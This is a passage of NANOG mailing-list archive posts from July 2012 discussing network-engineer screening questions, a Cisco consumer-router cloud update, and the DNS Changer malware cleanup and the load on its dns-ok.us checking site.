experience... I've applied for a few jobs in my time... I thought to myself "I'll have a crack with a few comments!!!"... ....then I read down the next 30 posts and decided that perhaps I didn't really know enough about networking to really comment... ...and perhaps I needed a bit more grey hair and eat more RFCs for breakfast... ...then I read down the next 30 posts and realised that I really didn't know enough about computing to comment.... ...and perhaps my problem wasn't lack of grey hair, but just to much hair... ...Talk about a bunch of intimidating uber geeks! :) I suspect that when I read down the next 30 posts I'll just back away from the computer slowly knowing that I'm just not smart enough to use this device. But seriously guys, great thread with tons of really interesting stuff and a bunch of history. D On 6/07/2012 5:02 a.m., William Herrin wrote: > Hi folks, > > I gave my HR folks a screening question to ask candidates for an IP > expert position. I've gotten some "unexpected" answers, so I want to > do a sanity check and make sure I'm not asking something unreasonable. > And by "unexpected" I don't mean naively incorrect answers, I mean > oh-my-God-how-did-you-get-that-cisco-certification answers. > > The question was: > > You implement a firewall on which you block all ICMP packets. What > part of the TCP protocol (not IP in general, TCP specifically) > malfunctions as a result? > > > My questions for you are: > > 1. As an expert who follows NANOG, do you know the answer? Or is this > question too hard? > > 2. Is the question too vague? Is there a clearer way to word it? > > 3. Is there a better screening question I could pass to HR to ask and > check the candidate's response against the supplied answer? > > Thanks, > Bill Herrin > > -- Don Gould 31 Acheson Ave Mairehau Christchurch, New Zealand Ph: + 64 3 348 7235 Mobile: + 64 21 114 0699 From elmi at 4ever.de Fri Jul 6 01:43:13 2012 From: elmi at 4ever.de (Elmar K. Bins) Date: Fri, 6 Jul 2012 08:43:13 +0200 Subject: job screening question In-Reply-To: References: <1341540632.64263.YahooMailClassic@web181104.mail.ne1.yahoo.com> Message-ID: <20120706064313.GU28581@h.detebe.org> On Thu, Jul 5, 2012 at 10:10 PM, Randy wrote: > How about another HR-Question: > > what do 0.0.0.0/1 and 128.0.0.0.0/1 as static-routes accomplish? Nothing much. The first is half-assed and the second's a typo. El "do I get the job?" mar... From goemon at anime.net Fri Jul 6 02:28:41 2012 From: goemon at anime.net (goemon at anime.net) Date: Fri, 6 Jul 2012 00:28:41 -0700 (PDT) Subject: Cisco Update In-Reply-To: References: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com> Message-ID: "We take responsibility for that lack of clarity, and we are taking steps to make this right." including firing the idiot responsible? -Dan On Thu, 5 Jul 2012, Cameron Byrne wrote: > In Cisco's defense, perhaps the legalese did not fully communicate the > intent of the service. > > http://blogs.cisco.com/home/update-answering-our-customers-questions-about-cisco-connect-cloud-2/ > > CB > > On Jul 5, 2012 8:52 AM, "Mario Eirea" wrote: >> >> Has anyone seen this yet? Looks like Cisco was forcing people to join its > Cloud service through an update for it's consumer level routers. >> >> > http://www.neowin.net/news/cisco-locks-users-out-of-their-routers-requires-invasive-cloud-service >> >> -Mario Eirea > From mpalmer at hezmatt.org Fri Jul 6 02:42:42 2012 From: mpalmer at hezmatt.org (Matthew Palmer) Date: Fri, 6 Jul 2012 17:42:42 +1000 Subject: job screening question In-Reply-To: <86obntzj2y.fsf@seastrom.com> References: <86obntzj2y.fsf@seastrom.com> Message-ID: <20120706074242.GY2221@hezmatt.org> On Thu, Jul 05, 2012 at 11:04:05PM -0400, Robert E. Seastrom wrote: > Diogo Montagner writes: > > For screening questions (for 1st level filtering), IMO, the questions > > has to be straight to the point, for example: > > > > 1) What is the LSA number for an external route in OSPF? > > > > This can have two answer: 5 or 7. So, I will accept if the candidate > > answer 5, 7 or 5 and 7. Later on (the next level of the interview), a > > techinical interviewer will chech if the candidate understand the > > differences of LSA 5 and 7. > > Frankly, this feels a bit like asking what the 9th byte in an IP > header is used for (it's TTL, but who's, uh, counting?) -- "That's why > God gave us packet analyzers" should be counted as an acceptable > answer. If not, you'll find yourself skipping over plenty of > extremely well qualified candidates in favor of those who have crammed > recently for some sort of exam in hopes of compensating for their > short CV. Ugh, I know someone (thankfully no longer a current colleague) who ardently *defends* his use of questions like "what does the -M option to ps do?" on the basis that "any senior person who knows what they're doing should know all the options to ps!". No, you useless tit, anyone who knows what they're doing should know how to read a bloody manpage. Trivia tests get you hiring people who know trivia. Knowing trivia has it's productivity benefits, but if you can't apply it, it's useless. - Matt -- Politics and religion are just like software and hardware. They all suck, the documentation is provably incorrect, and all the vendors tell lies. -- Andrew Dalgleish, in the Monastery From hank at efes.iucc.ac.il Fri Jul 6 02:54:09 2012 From: hank at efes.iucc.ac.il (Hank Nussbacher) Date: Fri, 06 Jul 2012 10:54:09 +0300 Subject: Cisco Update In-Reply-To: References: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com> Message-ID: <5.1.1.6.2.20120706105226.052719d0@efes.iucc.ac.il> At 00:28 06/07/2012 -0700, goemon at anime.net wrote: >"We take responsibility for that lack of clarity, and we are taking steps >to make this right." > >including firing the idiot responsible? The Nussbacher axiom of management - "Management is like a cesspool - the really big chunks float to the top". I would assume the person responsible will one day be running Cisco. -Hank >-Dan > >On Thu, 5 Jul 2012, Cameron Byrne wrote: > >>In Cisco's defense, perhaps the legalese did not fully communicate the >>intent of the service. >> >>http://blogs.cisco.com/home/update-answering-our-customers-questions-about-cisco-connect-cloud-2/ >> >>CB >> >>On Jul 5, 2012 8:52 AM, "Mario Eirea" wrote: >>> >>>Has anyone seen this yet? Looks like Cisco was forcing people to join its >>Cloud service through an update for it's consumer level routers. >>> >>http://www.neowin.net/news/cisco-locks-users-out-of-their-routers-requires-invasive-cloud-service >>> >>>-Mario Eirea From rayw at rayw.net Fri Jul 6 04:39:13 2012 From: rayw at rayw.net (Ray Wong) Date: Fri, 6 Jul 2012 02:39:13 -0700 Subject: job screening question In-Reply-To: <20120706074242.GY2221@hezmatt.org> References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> Message-ID: > > Ugh, I know someone (thankfully no longer a current colleague) who ardently > *defends* his use of questions like "what does the -M option to ps do?" on > the basis that "any senior person who knows what they're doing should know > all the options to ps!". No, you useless tit, anyone who knows what they're > doing should know how to read a bloody manpage. > Beyond that, if by "Senior" the role is the one the other tech people turn to when they're out of knowledge/skills/ability, there's just too much breadth to remember every detail about every tool. Quite the opposite from remembering every option to a tool, it's impossible to even keep track of every tool. The job as "senior" people is to figure out the stuff that we don't always know within that company. The main benefit of questions for HR to ask is the bozon filter: make sure it's actually someone who does network, or systems, or database, or whatever work. If one question (or even 10) could reveal the level of responsibility someone were capable of, we wouldn't need the interview process. From joseph.snyder at gmail.com Fri Jul 6 08:28:10 2012 From: joseph.snyder at gmail.com (joseph.snyder at gmail.com) Date: Fri, 06 Jul 2012 09:28:10 -0400 Subject: job screening question In-Reply-To: <20120706074242.GY2221@hezmatt.org> References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> Message-ID: I agree. Let the person talk do a few probing questions based off what they say. If you yourself have any value you should be able to tell if they have a chance. Also I would prefer someone who says I don't know for sure but maybe something along these lines, and then wants to know the right answer. Passion is also important, if you are willing to hire someone who is in it for just a paycheck, save yourself the headache and get a contractor. -- Sent from my Android phone with K-9 Mail. Please excuse my brevity. Matthew Palmer wrote: On Thu, Jul 05, 2012 at 11:04:05PM -0400, Robert E. Seastrom wrote: > Diogo Montagner writes: > > For screening questions (for 1st level filtering), IMO, the questions > > has to be straight to the point, for example: > > > > 1) What is the LSA number for an external route in OSPF? > > > > This can have two answer: 5 or 7. So, I will accept if the candidate > > answer 5, 7 or 5 and 7. Later on (the next level of the interview), a > > techinical interviewer will chech if the candidate understand the > > differences of LSA 5 and 7. > > Frankly, this feels a bit like asking what the 9th byte in an IP > header is used for (it's TTL, but who's, uh, counting?) -- "That's why > God gave us packet analyzers" should be counted as an acceptable > answer. If not, you'll find yourself skipping over plenty of > extremely well qualified candidates in favor of those who have crammed > recently for some sort of exam in hopes of compensating for their > short CV. Ugh, I know someone (thankfully no longer a current colleague) who ardently *defends* his use of questions like "what does the -M option to ps do?" on the basis that "any senior person who knows what they're doing should know all the options to ps!". No, you useless tit, anyone who knows what they're doing should know how to read a bloody manpage. Trivia tests get you hiring people who know trivia. Knowing trivia has it's productivity benefits, but if you can't apply it, it's useless. - Matt -- Politics and religion are just like software and hardware. They all suck, the documentation is provably incorrect, and all the vendors tell lies. -- Andrew Dalgleish, in the Monastery From itsmemattchung at gmail.com Fri Jul 6 09:19:48 2012 From: itsmemattchung at gmail.com (Matt Chung) Date: Fri, 6 Jul 2012 09:19:48 -0500 Subject: job screening question In-Reply-To: References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> Message-ID: A former manager of mine once told me you can gauge a persons understanding by the questions they ask and I personally agree with this statement. Most of us will be able to make a reasonable assessment of the person by listening to the content of their questions. I'm not looking for an immediate resolution, but trying to understand the thought process of the individual. I feel realistic scenarios provide some insight on the individual's analytical skills. "A client cannot access the website "http://xyz.com". What do you do to troubleshoot this issue?" Depending on the candidate, I've seen a variety of answers: 1) "Can you ping the device?" 2) "Can you access the gateway?" 3) "What does the running config look like on the router" 4) "Is there a firewall in between" I believe these questions may be asked in the right context provided there is enough information to isolate the issue to the network however the statement is devoid of anything useful that would make the network suspect. I would like to hear some questions such as: "are other websites accessible? Or is the only website the client is experiencing issues with?" "was the website working previously? when did it start happening?" "what does the client see on their screen ? are they getting an error?" These questions reflect the persons ability to accurately understand the problem before deep diving into the technical details. From there, you can get more technical. "Client is receiving an HTTP 404 error." Great, rule out network since this is an application layer response... just my .02. On Fri, Jul 6, 2012 at 8:28 AM, wrote: > I agree. Let the person talk do a few probing questions based off what > they say. If you yourself have any value you should be able to tell if they > have a chance. > > Also I would prefer someone who says I don't know for sure but maybe > something along these lines, and then wants to know the right answer. > Passion is also important, if you are willing to hire someone who is in it > for just a paycheck, save yourself the headache and get a contractor. > -- > Sent from my Android phone with K-9 Mail. Please excuse my brevity. > > Matthew Palmer wrote: > > On Thu, Jul 05, 2012 at 11:04:05PM -0400, Robert E. Seastrom wrote: > > Diogo Montagner writes: > > > For screening questions (for 1st level filtering), IMO, the questions > > > has to be straight to the point, for example: > > > > > > 1) What is the LSA number for an external route in OSPF? > > > > > > This can have two answer: 5 or 7. So, I will accept if the candidate > > > answer 5, 7 or 5 and 7. Later on (the next level of the interview), a > > > techinical interviewer will chech if the candidate understand the > > > differences of LSA 5 and 7. > > > > Frankly, this feels a bit like asking what the 9th byte in an IP > > header is used for (it's TTL, but who's, uh, counting?) -- "That's why > > God gave us packet analyzers" should be counted as an acceptable > > answer. If not, you'll find yourself skipping over plenty of > > extremely well qualified candidates in favor of those who have crammed > > recently for some sort of exam in hopes of compensating for their > > short CV. > > Ugh, I know someone (thankfully no longer a current colleague) who ardently > *defends* his use of questions like "what does the -M option to ps do?" on > the basis that "any senior person who knows what they're doing should know > all the options to ps!". No, you useless tit, anyone who knows what they're > doing should know how to read a bloody manpage. > > Trivia tests get you hiring people who know trivia. Knowing trivia has it's > productivity benefits, but if you can't apply it, it's useless. > > - Matt > > -- > Politics and religion are just like software and hardware. They all suck, > the documentation is provably incorrect, and all the vendors tell lies. > -- Andrew Dalgleish, in the Monastery > > > -- -Matt Chung From valdis.kletnieks at vt.edu Fri Jul 6 10:12:50 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Fri, 06 Jul 2012 11:12:50 -0400 Subject: job screening question In-Reply-To: Your message of "Fri, 06 Jul 2012 17:42:42 +1000." <20120706074242.GY2221@hezmatt.org> References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> Message-ID: <40593.1341587570@turing-police.cc.vt.edu> On Fri, 06 Jul 2012 17:42:42 +1000, Matthew Palmer said: > Ugh, I know someone (thankfully no longer a current colleague) who ardently > *defends* his use of questions like "what does the -M option to ps do?" on Is that an African ps or a European ps? ;) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From nick at foobar.org Fri Jul 6 10:50:29 2012 From: nick at foobar.org (Nick Hilliard) Date: Fri, 06 Jul 2012 16:50:29 +0100 Subject: job screening question In-Reply-To: <40593.1341587570@turing-police.cc.vt.edu> References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> Message-ID: <4FF70945.4050507@foobar.org> On 06/07/2012 16:12, valdis.kletnieks at vt.edu wrote: > On Fri, 06 Jul 2012 17:42:42 +1000, Matthew Palmer said: > >> Ugh, I know someone (thankfully no longer a current colleague) who ardently >> *defends* his use of questions like "what does the -M option to ps do?" on > > Is that an African ps or a European ps? ;) I'll admit that I once asked a question like in an interview, but it was only because the candidate had said that he was an expert with the "tar" command. If you're going to be that full of poop on a CV, you should expect to be called up on it. [against my advice, the candidate was hired and was a disaster. I left the company shortly afterwards.] Nick From bill at herrin.us Fri Jul 6 11:25:52 2012 From: bill at herrin.us (William Herrin) Date: Fri, 6 Jul 2012 12:25:52 -0400 Subject: job screening question In-Reply-To: <4FF70945.4050507@foobar.org> References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> Message-ID: On Fri, Jul 6, 2012 at 11:50 AM, Nick Hilliard wrote: > I'll admit that I once asked a question like in an interview, but it was > only because the candidate had said that he was an expert with the "tar" > command. If you're going to be that full of poop on a CV, you should > expect to be called up on it. > > [against my advice, the candidate was hired and was a disaster. I left the > company shortly afterwards.] That sounds like the guy who on his resume under "training" listed the 3-day course and certification he got in configuring Kentrox CSU/DSUs. The limited space one has on a resume to present oneself and that's what he chose to tell me. I understand that maybe his company made him do it but there are some things you just don't admit to. Regards, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From eesslinger at fpu-tn.com Fri Jul 6 11:34:20 2012 From: eesslinger at fpu-tn.com (Eric J Esslinger) Date: Fri, 6 Jul 2012 11:34:20 -0500 Subject: DNS Changer items Message-ID: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> A) The DNS changer working group site http://www.dns-ok.us seems to be down for the clean people anyway. (Down for everyone agrees with me). B) Fox, CNN, and MSNBC have apparantly all run stories in the last couple of hours that essentially ended with 'Call your ISP if you have any questions' (gee thanks). And I'm told the ABC/CBS/NBC are running the same basic thing tonight, with the same basic ending. The more you know... __________________________ Eric Esslinger Information Services Manager - Fayetteville Public Utilities http://www.fpu-tn.com/ (931)433-1522 ext 165 This message may contain confidential and/or proprietary information and is intended for the person/entity to whom it was originally addressed. Any use by others is strictly prohibited. From jared at puck.nether.net Fri Jul 6 11:40:31 2012 From: jared at puck.nether.net (Jared Mauch) Date: Fri, 6 Jul 2012 12:40:31 -0400 Subject: DNS Changer items In-Reply-To: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> Message-ID: On Jul 6, 2012, at 12:34 PM, Eric J Esslinger wrote: > A) The DNS changer working group site http://www.dns-ok.us seems to be down for the clean people anyway. (Down for everyone agrees with me). Works via IPv6. (I suspect all the media attention you referenced may be causing some load issues over "Classic IP - Version 4"). - Jared puck:~$ curl -v dns-ok.us * About to connect() to dns-ok.us port 80 (#0) * Trying 2606:700::2644:c160... connected * Connected to dns-ok.us (2606:700::2644:c160) port 80 (#0) > GET / HTTP/1.1 > User-Agent: curl/7.21.0 (x86_64-redhat-linux-gnu) libcurl/7.21.0 NSS/3.12.10.0 zlib/1.2.5 libidn/1.18 libssh2/1.2.4 > Host: dns-ok.us > Accept: */* > < HTTP/1.1 200 OK < Date: Fri, 06 Jul 2012 16:38:50 GMT < Server: Apache/2.2.22 (Unix) PHP/5.4.4 < Last-Modified: Wed, 30 May 2012 20:51:40 GMT < ETag: "7f5c1-67e-4c1471e35bf2a" < Accept-Ranges: bytes < Content-Length: 1662 < Connection: close < Content-Type: text/html < From andrew.fried at gmail.com Fri Jul 6 12:20:55 2012 From: andrew.fried at gmail.com (Andrew Fried) Date: Fri, 06 Jul 2012 13:20:55 -0400 Subject: DNS Changer items In-Reply-To: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> Message-ID: <4FF71E77.7050307@gmail.com> The dns-ok.us site is getting crushed from all the sudden media interest. We're trying to tweak it to handle the 50,000 or so simultaneous connections. Andy Andrew Fried andrew.fried at gmail.com On 7/6/12 12:34 PM, Eric J Esslinger wrote: > A) The DNS changer working group site http://www.dns-ok.us seems to be down for the clean people anyway. (Down for everyone agrees with me). > B) Fox, CNN, and MSNBC have apparantly all run stories in the last couple of hours that essentially ended with 'Call your ISP if you have any questions' (gee thanks). And I'm told the ABC/CBS/NBC are running the same basic thing tonight, with the same basic ending. > > The more you know... > > __________________________ > Eric Esslinger > Information Services Manager - Fayetteville Public Utilities > http://www.fpu-tn.com/ > (931)433-1522 ext 165 > > This message may contain confidential and/or proprietary information and is intended for the person/entity to whom it was originally addressed. Any use by others is strictly prohibited. > From bonomi at mail.r-bonomi.com Fri Jul 6 12:23:28 2012 From: bonomi at mail.r-bonomi.com (Robert Bonomi) Date: Fri, 6 Jul 2012 12:23:28 -0500 (CDT) Subject: DNS Changer items In-Reply-To: Message-ID: <201207061723.q66HNSli059518@mail.r-bonomi.com> Jared Mauch wrote: > > On Jul 6, 2012, at 12:34 PM, Eric J Esslinger wrote: > > > A) The DNS changer working group site http://www.dns-ok.us seems to be > > down for the clean people anyway. (Down for everyone agrees with me). > > Works via IPv6. (I suspect all the media attention you referenced may be > causing some load issues over "Classic IP - Version 4"). Loaded via IPv4, albeit slowly. at least for me. From valdis.kletnieks at vt.edu Fri Jul 6 12:44:15 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Fri, 06 Jul 2012 13:44:15 -0400 Subject: DNS Changer items In-Reply-To: Your message of "Fri, 06 Jul 2012 13:20:55 -0400." <4FF71E77.7050307@gmail.com> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> Message-ID: <8158.1341596655@turing-police.cc.vt.edu> On Fri, 06 Jul 2012 13:20:55 -0400, Andrew Fried said: > The dns-ok.us site is getting crushed from all the sudden media > interest. One wonders why it's so hard to get the media interested when it would be *helpful*. DNS Changer gets traction like 3 days before the drop dead date, IPv6 gets on the radar *after* we run out of v4 /8's to give to regionals, etc... -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From sethm at rollernet.us Fri Jul 6 12:49:14 2012 From: sethm at rollernet.us (Seth Mattinen) Date: Fri, 06 Jul 2012 10:49:14 -0700 Subject: DNS Changer items In-Reply-To: <8158.1341596655@turing-police.cc.vt.edu> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> Message-ID: <4FF7251A.2040003@rollernet.us> On 7/6/12 10:44 AM, valdis.kletnieks at vt.edu wrote: > On Fri, 06 Jul 2012 13:20:55 -0400, Andrew Fried said: >> The dns-ok.us site is getting crushed from all the sudden media >> interest. > > One wonders why it's so hard to get the media interested when it > would be *helpful*. DNS Changer gets traction like 3 days before the > drop dead date, IPv6 gets on the radar *after* we run out of v4 /8's > to give to regionals, etc... > Reactive is easier to justify to the powers that be than proactive. ~Seth From cb.list6 at gmail.com Fri Jul 6 12:52:56 2012 From: cb.list6 at gmail.com (Cameron Byrne) Date: Fri, 6 Jul 2012 10:52:56 -0700 Subject: DNS Changer items In-Reply-To: <4FF7251A.2040003@rollernet.us> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> Message-ID: So insteading of turning the servers off, would it not have been helpful to have the servers return a "captive portal" type of reponse saying "hey, since you use this server, you are broken, go here to get fixed" Seems that would have been a more graceful ramp down. CB From r.engehausen at gmail.com Fri Jul 6 13:05:13 2012 From: r.engehausen at gmail.com (Roy) Date: Fri, 06 Jul 2012 11:05:13 -0700 Subject: DNS Changer items In-Reply-To: <8158.1341596655@turing-police.cc.vt.edu> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> Message-ID: <4FF728D9.2050408@gmail.com> On 7/6/2012 10:44 AM, valdis.kletnieks at vt.edu wrote: > On Fri, 06 Jul 2012 13:20:55 -0400, Andrew Fried said: >> The dns-ok.us site is getting crushed from all the sudden media >> interest. > One wonders why it's so hard to get the media interested when it > would be *helpful*. DNS Changer gets traction like 3 days before the > drop dead date, IPv6 gets on the radar *after* we run out of v4 /8's > to give to regionals, etc... Where you been? Its been in and out of the news for months. Examples: ABC covered it on April 11th, CBS on Feb 21st From kaeo at merike.com Fri Jul 6 13:06:14 2012 From: kaeo at merike.com (Merike Kaeo) Date: Fri, 6 Jul 2012 11:06:14 -0700 Subject: DNS Changer items In-Reply-To: References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> Message-ID: <2BC6678E-B339-4DA8-9D2E-9C8B7A89D1EA@merike.com> The ISPs who have been proactive in mitigating and redirecting have been/are doing this. (global reach here) The court ordered DNS servers have been up since Nov 9th and lots of outreach done....the intent was a graceful ramp down. Sadly, the state of folks helping with overall malware cleanup is still lots of finger pointing. FUD with press and over sensationalism not helping. - merike On Jul 6, 2012, at 10:52 AM, Cameron Byrne wrote: > So insteading of turning the servers off, would it not have been helpful to > have the servers return a "captive portal" type of reponse saying "hey, > since you use this server, you are broken, go here to get fixed" > > Seems that would have been a more graceful ramp down. > > CB From valdis.kletnieks at vt.edu Fri Jul 6 13:06:36 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Fri, 06 Jul 2012 14:06:36 -0400 Subject: DNS Changer items In-Reply-To: Your message of "Fri, 06 Jul 2012 10:52:56 -0700." References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> Message-ID: <9602.1341597996@turing-police.cc.vt.edu> On Fri, 06 Jul 2012 10:52:56 -0700, Cameron Byrne said: > So insteading of turning the servers off, would it not have been helpful to > have the servers return a "captive portal" type of reponse Not all DNS lookups are for HTTP. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From eesslinger at fpu-tn.com Fri Jul 6 13:10:16 2012 From: eesslinger at fpu-tn.com (Eric J Esslinger) Date: Fri, 6 Jul 2012 13:10:16 -0500 Subject: DNS Changer items In-Reply-To: <2BC6678E-B339-4DA8-9D2E-9C8B7A89D1EA@merike.com> Message-ID: <2730A40A53ADE9418D5F58E734953DF42B014C0FA5@exchange.corp.fpu-tn.com> We verified one a while back, who had already had the problem fixed when the FBI sent us the physical mail. Concidering number of internet customers in the US vs our internet customers with known number of US subsribers affected at it's height, I figure if the percentages are good we've taken care of several times the number of likely cases on our network with that one customer. *wink* I'm told by various sources to expect similar stories on the nightly national news programs tonight, with a similar 'call your isp' ending. I've also heard the site IS reachable via ipv6 and they are dealing with the load issues as we speak (and some people are getting through, albiet slowly). I'm pretty comfortable about my network; I've been catching dns lookup destinations from my users for months (not contents, just destination ip's) and the list of outside addresses covers most of the well know public dns servers (open dns, google, etc...) with the exception of a handful that seem to be running their own full blown recursive caching servers, which go everywhere looking for authoritative lookups. (One I knew about, he complains because I won't allow his basic cable account act as an open server for his DNS when he's out of town. If he wants a static IP I can arrange opening the port, till then... He is always welcome to VPN into his home network as well.) Been having callers look up their IP, then checking the query logs to see if they hit our dns servers. So far I'm at 100% I thought of whipping up a script for my recursive DNS servers to setup a webpage to let them see if they were accessing those servers, but I just don't have time right now (fiscal year just started and everyone wants their projects done 'now'.) Addendum: Site appears up and fast now. So that's something anyway. __________________________ Eric Esslinger Information Services Manager - Fayetteville Public Utilities http://www.fpu-tn.com/ (931)433-1522 ext 165 > -----Original Message----- > From: Merike Kaeo [mailto:kaeo at merike.com] > Sent: Friday, July 06, 2012 1:06 PM > To: Cameron Byrne > Cc: nanog at nanog.org > Subject: Re: DNS Changer items > > > The ISPs who have been proactive in mitigating and > redirecting have been/are doing this. (global reach here) > > The court ordered DNS servers have been up since Nov 9th and > lots of outreach done....the intent was a graceful ramp down. > Sadly, the state of folks helping with overall malware > cleanup is still lots of finger pointing. > > FUD with press and over sensationalism not helping. > > - merike > > > On Jul 6, 2012, at 10:52 AM, Cameron Byrne wrote: > > > So insteading of turning the servers off, would it not have been > > helpful to have the servers return a "captive portal" type > of reponse > > saying "hey, since you use this server, you are broken, go > here to get > > fixed" > > > > Seems that would have been a more graceful ramp down. > > > > CB > > > This message may contain confidential and/or proprietary information and is intended for the person/entity to whom it was originally addressed. Any use by others is strictly prohibited. From andrew.fried at gmail.com Fri Jul 6 13:15:37 2012 From: andrew.fried at gmail.com (Andrew Fried) Date: Fri, 06 Jul 2012 14:15:37 -0400 Subject: DNS Changer items In-Reply-To: References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> Message-ID: <4FF72B49.2020302@gmail.com> The DNS redirection began on November 8, 2011. The servers were instrumented to capture a very small portion of the dns data (source ip and port only) so that reports of infected users could be sent to the ISPs via reporting organizations like Shadowserver. Some ISPs did create walled gardens. Some merely redirected affected customers to their own internal DNS servers. Some ISPs did aggressive notifications to their users. And some ISPs did nothing. Sites were set up to allow users to check their systems (dns-ok.us, etc). The DCWG set up an information site to provide information on how to detect the DNSchanger infection and how to fix it. AV companies provided tools to help clean up systems, and the tools were published on the DCWG.org website. The FBI went to great lengths to get press coverage to get the word out. This operation has been ongoing for 7 months, 27 days and 14 hours. How much more of a graceful ramp down could there have been? Andy Andrew Fried andrew.fried at gmail.com On 7/6/12 1:52 PM, Cameron Byrne wrote: > So insteading of turning the servers off, would it not have been helpful to > have the servers return a "captive portal" type of reponse saying "hey, > since you use this server, you are broken, go here to get fixed" > > Seems that would have been a more graceful ramp down. > > CB > From r.engehausen at gmail.com Fri Jul 6 13:35:45 2012 From: r.engehausen at gmail.com (Roy) Date: Fri, 06 Jul 2012 11:35:45 -0700 Subject: DNS Changer items In-Reply-To: <9602.1341597996@turing-police.cc.vt.edu> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> <9602.1341597996@turing-police.cc.vt.edu> Message-ID: <4FF73001.4010809@gmail.com> On 7/6/2012 11:06 AM, valdis.kletnieks at vt.edu wrote: > On Fri, 06 Jul 2012 10:52:56 -0700, Cameron Byrne said: >> So insteading of turning the servers off, would it not have been helpful to >> have the servers return a "captive portal" type of reponse > Not all DNS lookups are for HTTP. If you turn the servers off, then everything fails. The user sits there bewildered and calls his/her ISP to report the Internet is down. If HTTP was pointed to a server that had a page that said what the problem is and what to do, it would be a lot better. Any tech support these users call can diagnose the problem in a few seconds. From kmedcalf at dessus.com Fri Jul 6 13:41:41 2012 From: kmedcalf at dessus.com (Keith Medcalf) Date: Fri, 06 Jul 2012 12:41:41 -0600 Subject: job screening question In-Reply-To: Message-ID: <96c8cdf69d6c1b4784953994f4916287@mail.dessus.com> My response would be "insufficient information provided for meaningful diagnosis". The following could be issues: ... the user does not have a computer ... the computer is not turned on ... the keyboard is not plugged in ... the user is a quadraplegic and cannot use the mouse or keyboard ... the user is blind and cannot find the computer ... the user has a computer but is not connected to a network ... the monitor is not turned on ... the brightness is turned down too far on the monitor ... the user is dead How does the user know that it cannot access the web site? --- () ascii ribbon campaign against html e-mail /\ www.asciiribbon.org > -----Original Message----- > From: Matt Chung [mailto:itsmemattchung at gmail.com] > Sent: Friday, 06 July, 2012 08:20 > To: joseph.snyder at gmail.com > Cc: nanog at nanog.org > Subject: Re: job screening question > > A former manager of mine once told me you can gauge a persons understanding > by the questions they ask and I personally agree with this statement. Most > of us will be able to make a reasonable assessment of the person by > listening to the content of their questions. I'm not looking for an > immediate resolution, but trying to understand the thought process of the > individual. I feel realistic scenarios provide some insight on the > individual's analytical skills. > > "A client cannot access the website "http://xyz.com". What do you do to > troubleshoot this issue?" > > Depending on the candidate, I've seen a variety of answers: > 1) "Can you ping the device?" > 2) "Can you access the gateway?" > 3) "What does the running config look like on the router" > 4) "Is there a firewall in between" > > I believe these questions may be asked in the right context provided there > is enough information to isolate the issue to the network however the > statement is devoid of anything useful that would make the network suspect. > I would like to hear some questions such as: > > "are other websites accessible? Or is the only website the client is > experiencing issues with?" > "was the website working previously? when did it start happening?" > "what does the client see on their screen ? are they getting an error?" > > These questions reflect the persons ability to accurately understand the > problem before deep diving into the technical details. From there, you can > get more technical. "Client is receiving an HTTP 404 error." Great, rule > out network since this is an application layer response... > > just my .02. > > On Fri, Jul 6, 2012 at 8:28 AM, wrote: > > > I agree. Let the person talk do a few probing questions based off what > > they say. If you yourself have any value you should be able to tell if they > > have a chance. > > > > Also I would prefer someone who says I don't know for sure but maybe > > something along these lines, and then wants to know the right answer. 